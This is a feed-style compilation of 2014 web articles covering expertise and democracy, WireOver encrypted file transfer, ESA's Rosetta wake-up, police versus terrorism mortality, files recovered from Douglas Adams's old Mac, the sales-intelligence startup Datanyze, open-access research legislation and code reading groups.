
None of this ignorance stops people from arguing as though they are research scientists. Tackle a complex policy issue with a layman today, and you will get snippy and sophistic demands to show ever increasing amounts of “proof” or “evidence” for your case, even though the ordinary interlocutor in such debates isn’t really equipped to decide what constitutes “evidence” or to know it when it’s presented. The use of evidence is a specialized form of knowledge that takes a long time to learn, which is why articles and books are subjected to “peer review” and not to “everyone review,” but don’t tell that to someone hectoring you about the how things really work in Moscow or Beijing or Washington.

This subverts any real hope of a conversation, because it is simply exhausting — at least speaking from my perspective as the policy expert in most of these discussions — to have to start from the very beginning of every argument and establish the merest baseline of knowledge, and then constantly to have to negotiate the rules of logical argument. (Most people I encounter, for example, have no idea what a non-sequitur is, or when they’re using one; nor do they understand the difference between generalizations and stereotypes.) Most people are already huffy and offended before ever encountering the substance of the issue at hand.
Once upon a time — way back in the Dark Ages before the 2000s — people seemed to understand, in a general way, the difference between experts and laymen. There was a clear demarcation in political food fights, as objections and dissent among experts came from their peers — that is, from people equipped with similar knowledge. The public, largely, were spectators.

This was both good and bad. While it strained out the kook factor in discussions (editors controlled their letters pages, which today would be called “moderating”), it also meant that sometimes public policy debate was too esoteric, conducted less for public enlightenment and more as just so much dueling jargon between experts.

If experts go back to only talking to each other, that’s bad for democracy.

No one — not me, anyway — wants to return to those days. I like the 21st century, and I like the democratization of knowledge and the wider circle of public participation. That greater participation, however, is endangered by the utterly illogical insistence that every opinion should have equal weight, because people like me, sooner or later, are forced to tune out people who insist that we’re all starting from intellectual scratch. (Spoiler: We’re not.) And if that happens, experts will go back to only talking to each other. And that’s bad for democracy.

The downside of no gatekeepers

How did this peevishness about expertise come about, and how can it have gotten so immensely foolish?

Some of it is purely due to the globalization of communication. There are no longer any gatekeepers: the journals and op-ed pages that were once strictly edited have been drowned under the weight of self-publishable blogs. There was once a time when participation in public debate, even in the pages of the local newspaper, required submission of a letter or an article, and that submission had to be written intelligently, pass editorial review, and stand with the author’s name attached. Even then, it was a big deal to get a letter in a major newspaper.

Now, anyone can bum rush the comments section of any major publication. Sometimes, that results in a free-for-all that spurs better thinking. Most of the time, however, it means that anyone can post anything they want, under any anonymous cover, and never have to defend their views or get called out for being wrong.

Another reason for the collapse of expertise lies not with the global commons but with the increasingly partisan nature of U.S. political campaigns. There was once a time when presidents would win elections and then scour universities and think-tanks for a brain trust; that’s how Henry Kissinger, Samuel Huntington, Zbigniew Brzezinski and others ended up in government service while moving between places like Harvard and Columbia.

This is the code of the samurai, not the intellectual, and it privileges the campaign loyalist over the expert.

Those days are gone. To be sure, some of the blame rests with the increasing irrelevance of overly narrow research in the social sciences. But it is also because the primary requisite of seniority in the policy world is too often an answer to the question: “What did you do during the campaign?” This is the code of the samurai, not the intellectual, and it privileges the campaign loyalist over the expert.

I have a hard time, for example, imagining that I would be called to Washington today in the way I was back in 1990, when the senior Senator from Pennsylvania asked a former U.S. Ambassador to the UN who she might recommend to advise him on foreign affairs, and she gave him my name. Despite the fact that I had no connection to Pennsylvania and had never worked on his campaigns, he called me at the campus where I was teaching, and later invited me to join his personal staff.

Universities, without doubt, have to own some of this mess. The idea of telling students that professors run the show and know better than they do strikes many students as something like uppity lip from the help, and so many profs don’t do it. (One of the greatest teachers I ever had, James Schall, once wrote many years ago that “students have obligations to teachers,” including “trust, docility, effort, and thinking,” an assertion that would produce howls of outrage from the entitled generations roaming campuses today.) As a result, many academic departments are boutiques, in which the professors are expected to be something like intellectual valets. This produces nothing but a delusion of intellectual adequacy in children who should be instructed, not catered to.

The confidence of the dumb

There’s also that immutable problem known as “human nature.” It has a name now: it’s called the Dunning-Kruger effect, which says, in sum, that the dumber you are, the more confident you are that you’re not actually dumb. And when you get invested in being aggressively dumb…well, the last thing you want to encounter are experts who disagree with you, and so you dismiss them in order to maintain your unreasonably high opinion of yourself. (There’s a lot of that loose on social media, especially.)

All of these are symptoms of the same disease: a manic reinterpretation of “democracy” in which everyone must have their say, and no one must be “disrespected.” (The verb to disrespect is one of the most obnoxious and insidious innovations in our language in years, because it really means “to fail to pay me the impossibly high requirement of respect I demand.”) This yearning for respect and equality, even—perhaps especially—if unearned, is so intense that it brooks no disagreement. It represents the full flowering of a therapeutic culture where self-esteem, not achievement, is the ultimate human value, and it’s making us all dumber by the day.

Thus, at least some of the people who reject expertise are not really, as they often claim, showing their independence of thought. They are instead rejecting anything that might stir a gnawing insecurity that their own opinion might not be worth all that much.

Experts: the servants, not masters, of a democracy

So what can we do? Not much, sadly, since this is a cultural and generational issue that will take a long time come right, if it ever does. Personally, I don’t think technocrats and intellectuals should rule the world: we had quite enough of that in the late 20th century, thank you, and it should be clear now that intellectualism makes for lousy policy without some sort of political common sense. Indeed, in an ideal world, experts are the servants, not the masters, of a democracy.

But when citizens forgo their basic obligation to learn enough to actually govern themselves, and instead remain stubbornly imprisoned by their fragile egos and caged by their own sense of entitlement, experts will end up running things by default. That’s a terrible outcome for everyone.

Expertise is necessary, and it’s not going away. Unless we return it to a healthy role in public policy, we’re going to have stupider and less productive arguments every day. So here, presented without modesty or political sensitivity, are some things to think about when engaging with experts in their area of specialization.

We can all stipulate: the expert isn’t always right. But an expert is far more likely to be right than you are. On a question of factual interpretation or evaluation, it shouldn’t engender insecurity or anxiety to think that an expert’s view is likely to be better-informed than yours. (Because, likely, it is.) Experts come in many flavors. Education enables it, but practitioners in a field acquire expertise through experience; usually the combination of the two is the mark of a true expert in a field. But if you have neither education nor experience, you might want to consider exactly what it is you’re bringing to the argument. In any discussion, you have a positive obligation to learn at least enough to make the conversation possible. The University of Google doesn’t count. Remember: having a strong opinion about something isn’t the same as knowing something. And yes, your political opinions have value. Of course they do: you’re a member of a democracy and what you want is as important as what any other voter wants. As a layman, however, your political analysis, has far less value, and probably isn’t — indeed, almost certainly isn’t — as good as you think it is.

And how do I know all this? Just who do I think I am?

Well, of course: I’m an expert.

Tom Nichols is a professor of national security affairs at the U.S. Naval War College and an adjunct at the Harvard Extension School. He claims expertise in a lot of things, but his most recent book is No Use: Nuclear Weapons and U.S. National Security (Penn, 2014). The views expressed are entirely his own.

Protect Yourself From The NSA With WireOver’s Encrypted File Sharing | TechCrunch

$
0
0

Comments:"Protect Yourself From The NSA With WireOver’s Encrypted File Sharing | TechCrunch"

URL:http://techcrunch.com/2014/01/17/wireover/


Nothing is truly NSA-proof or hacker-proof, but WireOver wants to offer you more security than Dropbox, Google Drive, or Skydrive. The Y Combinator startup just emerged from stealth with a desktop app that lets you send files of any size for free. And for $10 a month, your transfers get end-to-end encryption so only the recipient can open them. WireOver can’t even look at what you’re sending.

If you just want to send huge video files or photo collections to friends and aren’t worried about encryption, WireOver is totally free for unlimited file-size sharing. But its premium level of privacy could be a big draw for anyone with sensitive files to send.

WireOver founder Trent Ashburn tells me there are security holes in the way big file storage and sharing providers transfer your stuff. “In the industry it’s called encryption in transit and encryption at rest. But the files arrive on the servers decrypted. Their servers will re-encrypt them and store them, but the encryption keys used are controlled by and accessed by the provider.”

Ashburn tells me there’s a risk of the same company having both a copy of your encrypted files and the key to open them. But with WireOver’s end-to-end encryption, files are never stored on its servers, and it doesn’t have the decryption key. “The approach we’re going for is ‘Trust No One’”.

WireOver Founder Trent Ashburn

Ashburn spent several years building computational models for quantitative hedge funds before becoming a semi-pro cyclist. He wanted to start a company he could relate to, and he found he was having some trouble with file transfers.

“With Dropbox, Google Drive, and Skydrive, sending small and medium-size files is pretty much solved but it’s a pain to send big files securely. There’a bunch of things that Dropbox works great for [like syncing]. And they do their best within their goals to have security, but they’re not trying to be the most secure tool. They’re trying to be your files everywhere.”

So Ashburn entered WireOver into Y Combinator. They built a bunch of failed prototypes before settling on a Python-based desktop client. Along with the YC funding it got from Andreessen Horowitz, SV Angel, and Yuri Milner, the four-person startup has raised an additional seed round from Bessemer Venture Partners, Boston’s .406 Ventures, and angels like BrandCast’s Hayes Metzger.

How To Use WireOver

Once you’ve installed WireOver, you just dump files into its little window, and type in the email address of the recipient[s]. Once they have WireOver installed and running, the file is transferred completely peer-to-peer, or routed by WireOver’s servers but isn’t stored there.

If you have a Pro account select “Secure” transfer , your file gets end-to-end encryption, even if the recipient doesn’t hasn’t bought a premium WireOver subscription. For even more security again man-in-the-middle attacks, you can request to verify the recipient’s machine’s crytopgraphic fingerprint.

The big downside to WireOver using a transfer system rather than cloud storage is that both the sender and recipient have to be online at the same time. You can’t just upload a file, email someone a link, and shut off your computer.

But since WireOver doesn’t store files, it doesn’t have to charge for unencrypted transfers. That means you could send 200 gigabyte or even terrabyte-sized files for free, which could cost hundreds or thousands of dollars a year on Dropbox, Drive, or SkyDrive. If you’re looking for security and privacy, WireOver might be worth the $10 a month.

Ashburn says some clients have switched to WireOver from sending physical hard drives and USB drives through the mail or with FedEx. While there are other encrypted file sharing services, we haven’t found any popular ones that offer unlimited file sizes for free, or encryption of those files for as cheap.

Companies large and small are seeing their data fall into the hands of hackers, and we’re realizing our governments are engaging in widespread surveillance. Meanwhile, as our cameras get better and our screens get bigger, file sizes just keep going up. So whether you’re paranoid or just want to send all your photos to mom, WireOver understands.

ESA’s ‘sleeping beauty’ wakes up from deep space hibernation / Rosetta / Space Science / Our Activities / ESA

$
0
0

Comments:"ESA’s ‘sleeping beauty’ wakes up from deep space hibernation / Rosetta / Space Science / Our Activities / ESA"

URL:http://www.esa.int/Our_Activities/Space_Science/Rosetta/ESA_s_sleeping_beauty_wakes_up_from_deep_space_hibernation


ESA’s ‘sleeping beauty’ wakes up from deep space hibernation

20 January 2014

It was a fairy-tale ending to a tense chapter in the story of the Rosetta space mission this evening as ESA heard from its distant spacecraft for the first time in 31 months.

Rosetta is chasing down Comet 67P/Churyumov-Gerasimenko, where it will become the first space mission to rendezvous with a comet, the first to attempt a landing on a comet’s surface, and the first to follow a comet as it swings around the Sun.

Since its launch in 2004, Rosetta has made three flybys of Earth and one of Mars to help it on course to its rendezvous with 67P/Churyumov-Gerasimenko, encountering asteroids Steins and Lutetia along the way.

Operating on solar energy alone, Rosetta was placed into a deep space slumber in June 2011 as it cruised out to a distance of nearly 800 million km from the warmth of the Sun, beyond the orbit of Jupiter.

Now, as Rosetta’s orbit has brought it back to within ‘only’ 673 million km from the Sun, there is enough solar energy to power the spacecraft fully again.

Thus today, still about 9 million km from the comet, Rosetta’s pre-programmed internal ‘alarm clock’ woke up the spacecraft. After warming up its key navigation instruments, coming out of a stabilising spin, and aiming its main radio antenna at Earth, Rosetta sent a signal to let mission operators know it had survived the most distant part of its journey.

The signal was received by both NASA’s Goldstone and Canberra ground stations at 18:18 GMT/ 19:18 CET, during the first window of opportunity the spacecraft had to communicate with Earth. It was immediately confirmed in ESA’s space operations centre in Darmstadt and the successful wake-up announced via the @ESA_Rosetta twitter account, which tweeted: “Hello, World!”

“We have our comet-chaser back,” says Alvaro Giménez, ESA’s Director of Science and Robotic Exploration. “With Rosetta, we will take comet exploration to a new level. This incredible mission continues our history of ‘firsts’ at comets, building on the technological and scientific achievements of our first deep space mission Giotto, which returned the first close-up images of a comet nucleus as it flew past Halley in 1986.”

How Rosetta wakes up from deep space hibernation

“This was one alarm clock not to hit snooze on, and after a tense day we are absolutely delighted to have our spacecraft awake and back online,” adds Fred Jansen, ESA’s Rosetta mission manager.

Comets are considered the primitive building blocks of the Solar System and likely helped to ‘seed’ Earth with water, perhaps even the ingredients for life. But many fundamental questions about these enigmatic objects remain, and through its comprehensive, in situ study of Comet 67P/Churyumov-Gerasimenko, Rosetta aims to unlock the secrets contained within.

“All other comet missions have been flybys, capturing fleeting moments in the life of these icy treasure chests,” says Matt Taylor, ESA’s Rosetta project scientist. “With Rosetta, we will track the evolution of a comet on a daily basis and for over a year, giving us a unique insight into a comet’s behaviour and ultimately helping us to decipher their role in the formation of the Solar System.”

But first, essential health checks on the spacecraft must be completed. Then the eleven instruments on the orbiter and ten on the lander will be turned on and prepared for studying Comet 67P/Churyumov-Gerasimenko.

“We have a busy few months ahead preparing the spacecraft and its instruments for the operational challenges demanded by a lengthy, close-up study of a comet that, until we get there, we know very little about,” says Andrea Accomazzo, ESA’s Rosetta operations manager.

Rosetta’s first images of 67P/Churyumov-Gerasimenko are expected in May, when the spacecraft is still 2 million km from its target. Towards the end of May, the spacecraft will execute a major manoeuvre to line up for its critical rendezvous with the comet in August.

After rendezvous, Rosetta will start with two months of extensive mapping of the comet’s surface, and will also make important measurements of the comet’s gravity, mass and shape, and assess its gaseous, dust-laden atmosphere, or coma. The orbiter will also probe the plasma environment and analyse how it interacts with the Sun’s outer atmosphere, the solar wind.

Using these data, scientists will choose a landing site for the mission’s 100 kg Philae probe. The landing is currently scheduled for 11 November and will be the first time that a landing on a comet has ever been attempted.

In fact, given the almost negligible gravity of the comet’s 4 km-wide nucleus, Philae will have to use ice screws and harpoons to stop it from rebounding back into space after touchdown.

Among its wide range of scientific measurements, Philae will send back a panorama of its surroundings, as well as very high-resolution pictures of the surface. It will also perform an on-the-spot analysis of the composition of the ices and organic material, including drilling down to 23 cm below the surface and feeding samples to Philae’s on-board laboratory for analysis.

The focus of the mission will then move to the ‘escort’ phase, during which Rosetta will stay alongside the comet as it moves closer to the Sun, monitoring the ever-changing conditions on the surface as the comet warms up and its ices sublimate.

The comet will reach its closest distance to the Sun on 13 August 2015 at about 185 million km, roughly between the orbits of Earth and Mars. Rosetta will follow the comet throughout the remainder of 2015, as it heads away from the Sun and activity begins to subside.

“We will face many challenges this year as we explore the unknown territory of comet 67P/Churyumov-Gerasimenko and I’m sure there will be plenty of surprises, but today we are just extremely happy to be back on speaking terms with our spacecraft,” adds Matt Taylor.


1964-2014: 50 years serving European Cooperation and Innovation

In 1964, the Conventions of the European Launcher Development Organisation (ELDO) and the European Space Research Organisation (ESRO) entered into force. A little more than a decade later, the European Space Agency (ESA) was established, taking over from these two organisations.

2014 will be dedicated to addressing the future in the light of these 50 years of unique achievements in space, which have put ESA among the leading space agencies in the world.

The motto 'serving European cooperation and innovation' underlines how much ESA, together with the national delegations from its 20 Member States, space industry and the scientific community, has made a difference.

Fifty years of European cooperation in space is an anniversary for the whole space sector in Europe, which can be proud of its results and achievements. But it is more than that: it is a testimony that the idea of Europe, European identity and progress has been served by ESA, and that continues to be its mission for the future.

About the European Space Agency

The European Space Agency (ESA) is Europe's gateway to space.

ESA is an intergovernmental organisation, created in 1975, with the mission to shape the development of Europe's space capability and ensure that investment in space delivers benefits to the citizens of Europe and the world.

ESA has 20 Member States: Austria, Belgium, the Czech Republic, Denmark, Finland, France, Germany, Greece, Ireland, Italy, Luxembourg, the Netherlands, Norway, Poland, Portugal, Romania, Spain, Sweden, Switzerland and the United Kingdom, of whom 18 are Member States of the EU.

ESA has Cooperation Agreements with eight other Member States of the EU. Canada takes part in some ESA programmes under a Cooperation Agreement.

ESA is also working actively with the EU, for the implementation of the programmes Galileo and Copernicus.

By coordinating the financial and intellectual resources of its members, ESA can undertake programmes and activities far beyond the scope of any single European country.

ESA develops the launchers, spacecraft and ground facilities needed to keep Europe at the forefront of global space activities.

Today, it launches satellites for Earth observation, navigation, telecommunications and astronomy, sends probes to the far reaches of the Solar System and cooperates in the human exploration of space.

Learn more at www.esa.int

For further information:
ESA Media Relations Office
Email: media@esa.int
Tel: +33 1 53 69 72 99

Rate this Views Share
  • Currently 5 out of 5 Stars.
  • 1
  • 2
  • 3
  • 4
  • 5
Rating: 4.85/5 (161 votes cast)

Thank you for rating!

You have already rated this page, you can only rate it once!

Your rating has been changed, thanks for rating!

20839

You're Eight Times More Likely to be Killed by a Police Officer than a Terrorist | Cato @ Liberty

$
0
0

Comments:"You’re Eight Times More Likely to be Killed by a Police Officer than a Terrorist"

URL:http://www.cato.org/blog/youre-eight-times-more-likely-be-killed-police-officer-terrorist


It got a lot of attention this morning when I tweeted, “You’re Eight Times More Likely to be Killed by a Police Officer than a Terrorist.” It’s been quickly retweeted dozens of times, indicating that the idea is interesting to many people. So let’s discuss it in more than 140 characters.

In case it needs saying: Police officers are unlike terrorists in almost all respects. Crucially, the goal of the former, in their vastest majority, is to have a stable, peaceful, safe, law-abiding society, which is a goal we all share. The goal of the latter is … well, it’s complicated. I’ve cited my favorite expert on that, Audrey Kurth Cronin, here and here and here. Needless to say, the goal of terrorists is not that peaceful, safe, stable society.

I picked up the statistic from a blog post called: “Fear of Terror Makes People Stupid,” which in turn cites the National Safety Council for this and lots of other numbers reflecting likelihoods of dying from various causes. So dispute the number(s) with them, if you care to.

I take it as a given that your mileage may vary. If you dwell in the suburbs or a rural area, and especially if you’re wealthy, white, and well-spoken, your likelihood of death from these two sources probably converges somewhat (at very close to zero).

The point of the quote is to focus people on sources of mortality society-wide, because this focus can guide public policy efforts at reducing death. (Thus, the number is not a product of the base rate fallacy.) In my opinion, too many people are still transfixed by terrorism despite the collapse of Al Qaeda over the last decade and the quite manageable—indeed, the quite well-managed—danger that terrorism presents our society today.

If you want to indulge your fears and prioritize terrorism, you’ll have plenty of help, and neither this blog post nor any other appeal to reason or statistics is likely to convince you. Among the John Mueller articles I would recommend, though, is “Witches, Communists, and Terrorists: Evaluating the Risks and Tallying the Costs” (with Mark Stewart).

If one wants to be clinical about what things reduce death to Americans, one should ask why police officers are such a significant source of danger. I have some ideas.

Cato’s work on the War on Drugs shows how it produces danger to the public and law enforcement both, not to mention loss of privacy and civil liberties, disrespect for law enforcement, disregard of the rule of law, and so on. Is the sum total of mortality and morbidity reduced or increased by the War on Drugs? I don’t know to say. But the War on Drugs certainly increases the danger to innocent people (including law enforcement personnel), where drug legalization would allow harm to naturally concentrate on the people who choose unwisely to use drugs.

The militarization of law enforcement probably contributes to the danger. Cato’s Botched Paramilitary Police Raids map illustrates the problem of over-aggressive policing. Cato alum Radley Balko now documents these issues at the Huffington Post. Try out his “Cop or Soldier?” quiz.

There are some bad apples in the police officer barrel. Given the power that law enforcement personnel have—up to and including the power to kill—I’m not satisfied that standards of professionalism are up to snuff. You can follow the Cato Institute’s National Police Misconduct Reporting Project on Twitter at @NPMRP.

If the provocative statistic cited above got your attention, that’s good. If it adds a little more to your efforts at producing a safe, stable, peaceful, and free society, all the better.

Douglas Adams's Mac IIfx

$
0
0

Comments:"Douglas Adams's Mac IIfx"

URL:http://www.vintagemacworld.com/iifx.html


At the end of 2003, I was looking to buy a Mac IIfx for some hacking. I needed a Mac with six NuBus slots and the IIfx is the fastest model that fitted my requirements. One turned up on eBay and I was able to win the auction at a sensible price. The seller was a computer scrapper who had no knowledge or interest in the history of the system.

The system was purchased "untested, as is" and the photo accompanying the auction (see opposite) indicated that it wasn't going to be in pristine condition. When delivered the case was filthy and the steel RF shielding inside had surface rust indicating that it had been stored in a damp environment for a couple of years. The side of the case (psu end) had four grubby chunks of Blu Tac attached. Obviously a previous owner had decided to stand the IIfx on its side as a tower case and used the Blu Tac to stabilise it. (If you try this at home with a IIfx, please stand the case on the other end so that the psu ventilation slots aren't blocked.)

I stripped out the components, scraped off the majority of the Blu Tac and dumped the bare case in the bath tub with some detergent. As the photos show, some of the Blu Tac is still lodged around the ventilation slots and the underside of the case has a peculiar sunburn pattern. My IIfx still looks a mess but I only bought it for hacking anyway.

When switched on for the first time, it was clear that the last user had little understanding of how to store files on the hard disk. The root directory contained hundreds of MacWrite documents. Scrolling through them was a pain and, as I have no interest in other people's private affairs, I selected the lot and deleted them. That was mistake number one. I left the applications folder intact to have a look at later.

In its day, the IIfx was Apple's flagship computer and a well specified machine would have left little change from£10,000. My new purchase had 20MB RAM, an A4 portrait display card, a 256 colour Toby video card and a very noisy Fujitsu (non-Apple ROM) hard disk drive running System software 7.5.5. All of the blanking plates for the NuBus slots had been removed and it is likely that any useful cards had been removed as the Mac descended the scrap chain; the Open Transport preferences contained a reference to an ethernet adapter and the control panel for a Radius display card was installed.

The applications software installed on the system didn't look very interesting. All of the files I had deleted were MacWrite documents and it appeared that the IIfx had been used as a glorified word processor. However Retrospect Remote was installed for backups so somebody had been using the Mac for serious work previously. The last backup was performed on 02-02-1997 but, according to the last modified file dates, the system remained in use until March 1999. Some power user utilities from CE and More were also installed.

I started up MacWrite Pro and noticed that it was registered to "Douglas Adams, Serious Productions Ltd". I paid little attention to this as I had seen warez copies of Claris software where the registered user was Douglas Adams. I then started Claris Resolve, ignoring a warning dialog (mistake number two), and noted that this software was also registered to Douglas Adams. The copies of Claris Works 4.0 and Now Up-to-Date were registered to Jane Belson; I was unfamiliar with the name but a quick web search determined that she is Douglas Adams's widow.

Deleting all those files suddenly seemed like a dumb thing to have done... To undo mistake number one, I popped an ethernet card in the IIfx, mounted an AppleShare volume and ran Norton Utilities to recover the files onto the server.

The results? I recovered hundreds of documents relating to Jane Belson's professional work and precisely two that bear the hand of Douglas Adams. I doubt whether the copyright lawyers would chase me for publishing his Idiots Guide to using a Mac but you wouldn't be thanking me either. For now at least, the draft of a TV sketch called Brief Re-encounter is strictly for my personal enjoyment.

And mistake number two? I should have paid attention to the dialog box when I'd started up Claris Resolve. In twenty years of Mac use working on literally thousands of systems, I've only seen viruses half a dozen times so I ignored the warning. How wrong can you get... A precautionary scan a few hours later using the old Disinfectant application showed that Claris Resolve had been infected by the MBDF A virus and that every application that I had subsequently run was infected too. Cheers, Douglas!

Jane Belson contacted me earlier this year, telling me that she recognised the IIfx as the one that sat next to her desk and to that of Douglas. A copy of the sketch Brief Re-encounter was sent to her.

Leander Kahney reported on the IIfx in his Cult of Mac weblog at Wired magazine in March 2004 (Article).

Copyright information: If you wish to use any images on these pages, please contact the author, Phil Beesley on beesley@mandrake.demon.co.uk.


This startup tells you when companies try your competitors' software -- and it's growing 25% a month | VentureBeat | Big Data | by John Koetsier

$
0
0

Comments:"This startup tells you when companies try your competitors' software -- and it's growing 25% a month | VentureBeat | Big Data | by John Koetsier"

URL:http://venturebeat.com/2014/01/20/this-startup-tells-you-when-companies-try-your-competitors-software-and-is-growing-25-a-month/


A tiny San Mateo startup that has taken no angel money, no venture capital, and no outside funding of any kind is growing at the torrid rate of 25 percent per month and luring away key employees from hot growing companies like KISSmetrics.

How? By offering you data you can’t get anywhere else.

LinkedIn

Datanyze founder and CEO Ilya Semin

“I validated this via my team,” Datanyze cofounder Ben Sardella, who was recently running sales and customer success at KISSmetrics, told me today. “We started using Datanyze, and within two and a half months closed the largest deal in KISSmetrics’ history.”

Datanyze is like Google for sales and marketing.

Every day, the company crawls millions of websites with its custom spider technology, searching for hints about what software each company is using. In the era of cloud computing, few things are private, and anything on your website related to that marketing automation system you’re using or that CRM you’ve adopted or that e-commerce engine you installed reveals traces of what systems you’ve bought and what solutions you’re using. Bits of code, fragments of Javascript, embeds, even CSS markup could be the clue.

That’s powerful, and it’s similar to what Datanyze competitors HG Data and Salesify do right now. What Datanyze is particularly excited about, however, is that its data is updated every single day.

And that can give sales reps seeming superpowers.

VentureBeat is studying Marketing Automation. Fill out our survey, and you’ll get our full report when it’s published.

“Because we do this on a daily basis, we can see when people start a software trial,” CEO Ilya Semin told me. “So we can tell their competitors, and they can call those companies, and the sales rep can say: “I see you’re checking out our competitor’s solution right now … why don’t you try ours as well?”

That’s pure marketing magic.

Datanyze

Datanyze data offers a unique insight into market share — in this case e-commerce engines.

Not only is the prospect clearly interested in the type of solution you’re offering, he or she is right in the buying cycle as well. And, since you know what solution they are currently testing and presumably have already built a comprehensive sales strategy against that competitor, it’s a fairly simple thing to make the case that, in the interests of covering all their bases, the prospect should give you a shot too. Instantly, you’re in the door.

“That’s our major differentiator,” Semin says.

Updating data every single day is unheard of in the traditional business data world, where data is often old and frequently outdated. Sardella told me about a $10,000 Data.com purchase that KISSmetrics made recently that turned out to be 80 percent inaccurate — causing the company to ask for a refund.

“Buying data is like driving a new car off the lot,” Sardella said. “The value drops 30 percent right away.”

Datanyze, however, says that its data keeps getting better every single day: fresher and fresher.

KISSmetrics is still a customer, as are HubSpot, the marketing automation vendor Act On, as well as many other well-known companies. One in particular, a leading video platform, has found the data so high quality it has increased its purchase from five seats late last year to “well over 100″ today.

Enterprise customers can use the Datanyze API to bring data right into their systems, or use its Salesforce integration, with prices starting at $1,200 for the first seat and going down for subsequent users. Small customers can get platform access and CSV exports for $500 for the first seat, but Datanyze is also looking to offer a freemium product shortly.

While still small — the company will hit $1M in annual revenue “pretty soon” — Datanyze is growing fast.

“We’re really starting to grow,” Sardella says. “By the end of this month we will increase our total revenue by 25% just over one month.”

As the company grows, more options become available. Making the data richer, adding more categories to the 25 or more that it currently searches for, and adding more filtering are all on the table, marketing head Jon Hearty told me.

“We’re also asking ourselves how we can deliver this data in a way that is more seamless for salespeople,” he said. “We built a Chrome plugin for websites — because sales reps are constantly surfing the web for prospects — that gives you all the information in your browser … software they use, company size … and a link to dump it into Salesforce.”

Clearly, with HG Data and Salesify, among other competitors, the big data industry for sales and marketing leads is heating up.

VentureBeat is providing our Marketing Automation Study to readers who fill out our survey. Share your experience, and you’ll get our full report when it’s published. Also: speak with the analyst who put this report together.

Half of taxpayer funded research will soon be available to the public

$
0
0

Comments:"Half of taxpayer funded research will soon be available to the public"

URL:http://www.washingtonpost.com/blogs/the-switch/wp/2014/01/17/half-of-taxpayer-funded-research-will-soon-be-available-to-the-public/


 

Proponents of the open access model for academic research notched a huge victory Thursday night when Congress passed a budget that will make about half of taxpayer-funded research available to the public.

Deep inside the $1.1 trillion Consolidated Appropriations Act for 2014 is a provision that requires federal agencies under the Labor, Health and Human Services, and Education portion of the bill with research budgets of $100 million or more to provide the public with online access to the research that they fund within 12 months of publication in a peer-reviewed journal.

According to the Scholarly Publishing and Academic Resources Coalition (SPARC), this means approximately $31 billion of the total $60 billion annual U.S. investment in taxpayer-funded research will become openly accessible. “This is an important step toward making federally funded scientific research available for everyone to use online at no cost,” said SPARC Executive Director Heather Joseph in a news  release. The language in the appropriations bill mirrors that in the White House open access memo from last year, and a National Institutes of Health public access program enacted in 2008.

Sen. Tom Harkin (D-Iowa) who was instrumental in getting the NIH program launched told The Post: "Expanding this policy to public health and education research is a step toward a more transparent government and better science.”

While the government funds a significant chunk of academic research in the United States, most taxpayers do not have access to the results of that research, which is often kept in pay-walled databases controlled by commercial publishers. As the Internet has made it far easier for academics to share their research results, many have pushed for a more open system that allows public sharing of scholarly research commonly called "open access." But some publishers have cracked down, even going after individual professors who post their research on their university Web pages.

In recent years, Congress has considered various legislative proposals concerning access to publicly funded research. The Fair Access to Science and Technology Research Act would have mandated that publicly funded research be freed up within six months of publication. Another, the Research Works Act, would have effectively prohibited open access mandates and rolled back the NIH's public access program.

Code is not literature

$
0
0

Comments:"Code is not literature"

URL:http://www.gigamonkeys.com/code-reading/


20 January 2014

I have started code reading groups at the last two companies I’ve worked at, Etsy and Twitter, and some folks have asked for my advice about code reading and running code reading groups. Tl;dr: don’t start a code reading group. What you should start instead I’ll get to in a moment but first I need to explain how I arrived at my current opinion.

As a former English major and a sometimes writer, I had always been drawn to the idea that code is like literature and that we ought to learn to write code the way we learn to write good English: by reading good examples. And I’m certainly not the only one to have taken this point of view—Donald Knuth, in addition to his work on The Art of Computer Programming and TeX, has long been a proponent of what he calls Literate Programming and has published several of his large programs as books.

On the other hand, long before I got to Etsy and started my first code reading group I had in hand several pieces of evidence that should have suggested to me that this was the wrong way to look at things.

First, when I did my book of interviews with programmers, Coders at Work, I asked pretty much everyone about code reading. And while most of them said it was important and that programmers should do it more, when I asked them about what code they had read recently, very few of them had any great answers. Some of them had done some serious code reading as young hackers but almost no one seemed to have a regular habit of reading code. Knuth, the great synthesizer of computer science, does seem to read a lot of code and Brad Fitzpatrick was able to talk about several pieces of open source code that he had read just for the heck of it. But they were the exceptions.

If that wasn’t enough, after I finished Coders I had a chance to interview Hal Ableson, the famous MIT professor and co-author of the Structure and Interpretation of Computer Programs. The first time I talked to him I asked my usual question about reading code and he gave the standard answer—that it was important and we should do it more. But he too failed to name any code he had read recently other than code he was obliged to: reviewing co-workers’ code at Google where he was on sabbatical and grading student code at MIT. Later I asked him about this disconnect:

Seibel: I’m still curious about this split between what people say and what they actually do. Everyone says, “People should read code” but few people seem to actually do it. I’d be surprised if I interviewed a novelist and asked them what the last novel they had read was, and they said, “Oh, I haven’t really read a novel since I was in grad school.” Writers actually read other writers but it doesn’t seem that programmers really do, even though we say we should. Abelson: Yeah. You’re right. But remember, a lot of times you crud up a program to make it finally work and do all of the things that you need it to do, so there’s a lot of extraneous stuff around there that isn’t the core idea. Seibel: So basically you’re saying that in the end, most code isn’t worth reading? Abelson: Or it’s built from an initial plan or some kind of pseudocode. A lot of the code in books, they have some very cleaned-up version that doesn’t do all the stuff it needs to make it work. Seibel: I’m thinking of the preface to SICP, where it says, “programs must be written for people to read and only incidentally for machines to execute.” But it seems the reality you just described is that in fact, most programs are written for machines to execute and only incidentally, if at all, for people to read. Abelson: Well, I think they start out for people to read, because there’s some idea there. You explain stuff. That’s a little bit of what we have in the book. There are some fairly significant programs in the book, like the compiler. And that’s partly because we think the easiest way to explain what it’s doing is to express that in code.

Yet somehow even this explicit acknowledgement that most real code isn’t actually in a form that can be simply read wasn’t enough to lead me to abandon the literature seminar model when I got to Etsy. For our first meeting I picked Jeremy Ashkenas’s backbone.js because many of the Etsy developers would be familiar with Javascript and because I know Jeremy is particularly interested in writing readable code. I still envisioned something like a literature seminar but I figured that a lot of people wouldn’t actually have done the reading in advance (well, maybe not so different from a literature seminar) so I decided to start things off by presenting the code myself before the group discussion.

As I prepared my presentation, I found myself falling into my usual pattern when trying to really understand a piece of code—in order to grok it I have to essentially rewrite it. I’ll start by renaming a few things so they make more sense to me and then I’ll move things around to suit my ideas about how to organize code. Pretty soon I’ll have gotten deep into the abstractions (or lack thereof) of the code and will start making bigger changes to the structure of the code. Once I’ve completely rewritten the thing I usually understand it pretty well and can even go back to the original and understand it too. I have always felt kind of bad about this approach to code reading but it's the only thing that's ever worked for me.

